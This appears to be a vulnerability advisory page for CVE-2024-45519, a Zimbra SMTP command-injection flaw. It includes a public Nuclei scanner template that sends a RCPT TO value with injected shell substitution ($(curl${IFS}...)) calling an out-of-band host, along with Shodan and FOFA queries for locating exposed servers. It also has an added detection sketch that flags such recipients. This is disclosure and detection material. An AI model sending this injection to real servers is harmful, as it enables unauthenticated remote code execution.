CVE-2024-45519: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution

Date: 2025-08-01 | Affected software: Zimbra Collaboration Suite | PoC: Public

Vulnerability description

CVE-2024-45519 is an SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. It arises from improper sanitization of SMTP input, which lets an attacker craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.

PoC code [public]

id: CVE-2024-45519

info:
  name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
  author: pdresearch,iamnoooob,parthmalhotra,ice3man543
  severity: critical
  description: |
    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.
  reference:
    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
    - https://blog.projectdiscovery.io/zimbra-remote-code-execution/
  classification:
    epss-score: 0.9415
    epss-percentile: 0.99909
    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
  metadata:
    vendor: synacor
    product: zimbra_collaboration_suite
    shodan-query:
      - http.title:"zimbra collaboration suite"
      - http.title:"zimbra web client sign in"
      - http.favicon.hash:1624375939
    fofa-query:
      - title="zimbra web client sign in"
      - title="zimbra collaboration suite"
  tags: cve,cve2024,rce,zimbra,kev,vkev

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/net');
      let address = Host+":"+Port;
      let conn;
      conn=  m.Open('tcp', address)
      conn.Send('EHLO localhost\r\n');
      conn.RecvString()
      conn.Send('MAIL FROM: <aaaa@mail.domain.com>\r\n');
      conn.RecvString()
      conn.Send('RCPT TO: <"aabbb$(curl${IFS}'+oast+')"@mail.domain.com>\r\n');
      conn.RecvString()
      conn.Send('DATA\r\n');
      conn.RecvString()
      conn.Send('aaa\r\n');
      conn.RecvString()
      conn.Send('.\r\n');
      resp = conn.RecvString()
      conn.Send('QUIT\r\n');
      conn.Close()
      resp
    args:
      Host: "{{Host}}"
      Port: 25
      oast: "{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "message delivered"
# digest: 4b0a00483046022100e90848c0a6406b00a69f94dae96a2fb1a8a306e7cb77f507ab7315752e5b4df8022100f9b671fb24df94b219f887720ffd3e3723253e3e569cfbcf4bbeccfdaf4a4c2a:922c64590222798bb761d5b6d8e72950
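
Detection sketch for the pattern the template sends, added here as an example (it is not part of the template or of ProjectDiscovery's code). It scans SMTP command lines for `RCPT TO` recipients that carry shell substitution syntax; the one-command-per-line input format, the function names and the `example.invalid` host are assumptions, and the sample lines are constructed.

```javascript
// Added example: flag RCPT TO commands whose recipient contains shell
// substitution syntax, as in the template's RCPT TO line.
// Assumption: input is one raw SMTP command per line (e.g. a session capture).

// Shell constructs that have no place in a mail address.
const SHELL_PATTERNS = [
  { name: 'command-substitution', re: /\$\(/ },
  { name: 'variable-expansion', re: /\$\{/ },
  { name: 'backtick-substitution', re: /`/ },
];

// Return the address inside "RCPT TO:<...>" (case-insensitive), or null.
function extractRecipient(line) {
  const m = /RCPT\s+TO:\s*<(.*)>/i.exec(line);
  return m ? m[1] : null;
}

// Return one finding per suspicious RCPT TO line (1-based line numbers).
function scanSmtpLines(lines) {
  const findings = [];
  lines.forEach((line, idx) => {
    const rcpt = extractRecipient(line);
    if (rcpt === null) return; // not a RCPT TO command
    const hits = SHELL_PATTERNS.filter(p => p.re.test(rcpt)).map(p => p.name);
    if (hits.length > 0) {
      findings.push({ lineNo: idx + 1, recipient: rcpt, hits });
    }
  });
  return findings;
}

// Constructed sample transcript, not real traffic.
const SAMPLE = [
  'EHLO localhost',
  'MAIL FROM: <aaaa@mail.domain.com>',
  'RCPT TO: <user@mail.domain.com>',
  'RCPT TO: <billing+$100@mail.domain.com>', // bare "$" alone is not flagged
  'RCPT TO: <"aabbb$(curl${IFS}example.invalid)"@mail.domain.com>',
  'DATA',
];

console.log(JSON.stringify(scanSmtpLines(SAMPLE), null, 2));
```

Only line 5 of the sample is reported; the address containing a bare `$` passes, which keeps the rule from firing on unusual but legitimate local parts.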
